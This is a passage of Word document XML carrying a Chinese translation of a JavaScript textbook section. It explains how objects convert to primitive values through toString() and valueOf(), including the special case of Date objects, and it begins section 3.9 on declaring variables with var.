        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回了一个可读的（可被</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解析的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>）日期和时间字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>类（</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp class</w:t>
      </w:r>
      <w:r>
        <w:t>）定义的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象转换为表示正则表达式直接量的字符串：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[1,2,3].toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"1,2,3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(function(x){f(x);}).toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"function(x){\n f(x);\n}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/\d</w:t>
      </w:r>
      <w:r>
        <w:t>+/g.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"/\\d+/g"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>new Date(2010,0,1).toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"Fri Jan 01 2010 00:00:00 GMT-0800(PST)"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另一个转换对象的函数是</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>。这个方法的任务并未详细定义：如果存在任意原始值，它就默认将对象转换为表示它的原始值。对象是复合值，而且大多数对象无法真正表示为一个原始值，因此默认的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法简单地返回对象本身，而不是返回一个原始值。数组、函数和正则表达式简单地继承了这个默认方法，调</w:t>
      </w:r>
      <w:r>
        <w:t>用这些类型的实例的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单返回对象本身。日期类定义的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回它的一个内部表示：</w:t>
      </w:r>
      <w:r>
        <w:t>1970</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日以来的毫秒数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var d=new Date(2010,0,1);//2010</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>太平洋时间</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>d.valueOf()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1262332800000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过使用我们刚刚讲解过的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就可以做到对象到字符串和对象到数字的转换了。但需要注意的是，在某些特殊的场景中，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行了完全不同的对象到原始值的转换。这些特殊场景在本节的最后会讲到。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中对象到字符串的转换经过了如下这些步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象具有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，则调用这个方法。如果它返回一个原始值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将这个值转换为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>如果本身不是字符串的话</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回这个字符串结果。需要注意的是，原始值到字符串的转换在表</w:t>
      </w:r>
      <w:r>
        <w:t>3-</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>中已经有了详尽的说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象没有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，或者这个方法并不返回一个原始值，那么</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会调用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果存在这个方法，则</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>调用它。如果返回值是原始值，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将这个值转换为字符串（如果本身不是字符串的话），并返回这个字符串结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>否则，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>无法从</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>获得一个原始值，因此这时它将抛出一个类型错误异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在对象到数字的转换过程中，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>做了同样的事情，只是它会首先尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如果对象具有</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者返回一个原始值，则</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将这个原始值转换为数字（如果需要的话）并返回这个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>否则，如果对象具有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，后者返回一个原始值，则</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将其转换并返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>否则，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>抛出一个类型错误异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象转换为数字的细节解释了为什么空数组会被转换为数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>以及为什么具有单个元素的数组同样会转换成一个数字</w:t>
      </w:r>
      <w:r>
        <w:t>。数组继承了默认的</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法返回一个对象而不是一个原始值，因此，数组到数字的转换则调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。空数组转换成为空字符串，空字符串转换成为数字</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。含有一个元素的数组转换为字符串的结果和这个元素转换字符串的结果一样。如果数组只包含一个数字元素，这个数字转换为字符串，再转换回数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以进行数学加法和字符串连接操作。如果它的其中一个操作数是对象，则</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将使用特殊的方法将对象转换为原始值，而不是使用其他算术运算符的方法执行对象</w:t>
      </w:r>
      <w:r>
        <w:t>到数字的转换，</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>相等运算符与此类似。如果将对象和一个原始值比较，则转换将会遵照对象到原始值的转换方式进行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>应用的对象到原始值的转换包含日期对象的一种特殊情形。日期类是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心中唯一的预先定义类型，它定义了有意义的向字符串和数字类型的转换。对于所有非日期的对象来说，对象到原始值的转换基本上是对象到数字的转换（首先调用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>），日期对象则使用对象到字符串的转换模式，然而，这里的转换和上文讲述的并不完全一致：通过</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>toStr</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ing()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的原始</w:t>
      </w:r>
      <w:r>
        <w:t>值将被直接使用，而不会被强制转换为数字或字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符以及其他关系运算符也会做对象到原始值的转换，但要除去日期对象的特殊情形：任何对象都会首先尝试调用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>，然后调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。不管得到的原始值是否直接使用，它都不会进一步被转换为数字或字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>和关系运算符是唯一执行这种特殊的字符串到原始值的转换方式的运算符。其他运算符到特定类型的转换都很明确，而且对日期对象来讲也没有特殊情况。例如</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>（减号）运算符把它的两个操作数都转换为数字。下面</w:t>
      </w:r>
      <w:r>
        <w:t>的代码展示了日期对象和</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“-”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var now=new Date();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个日期对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof(now+1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"string":"+"</w:t>
      </w:r>
      <w:r>
        <w:t>将日期转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>typeof(now-1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"number":"-"</w:t>
      </w:r>
      <w:r>
        <w:t>使用对象到数字的转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>now==now.toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>隐式的和显式的字符串转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>(now-1)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>将日期转换为数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="3_9_Bian_Liang_Sheng_Ming_"/>
      <w:r>
        <w:t>3.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　变量声明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，使用一个变量之前应当先声明</w:t>
      </w:r>
      <w:r>
        <w:t>。变量是使用关键字</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>来声明的，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也可以通过一个</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来声明多个变量：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i,sum;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>而且还可以将变量的初始赋值和变量声明合写在一起：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var message="hello";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0,j=0,k=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果未在</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明语句中给变量指定初始值，那么虽然声明了这个变量，但在给它存入一个值之前，它的初始值就是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们注意到，在</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环（在第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章会讲到）中同样可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句，这样可以更简洁地声明在循环体语法内中使用的循环变量。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++)console.log(i);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0,j=10;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>10;i++,j--)console.log(i*j);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p in o)console.log(p);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果你之前编写过诸如</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的静态语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>，你会注意到在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的变量声明中并没有指定变量的数据类型。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaSc</w:t>
      </w:r>
      <w:r>
        <w:t>ript</w:t>
      </w:r>
      <w:r>
        <w:t>变量可以是任意数据类型。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中首先将数字赋值给一个变量，随后再将字符串赋值给这个变量，这是完全合法的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=10;</w:t>
      </w:r>
    </w:p>
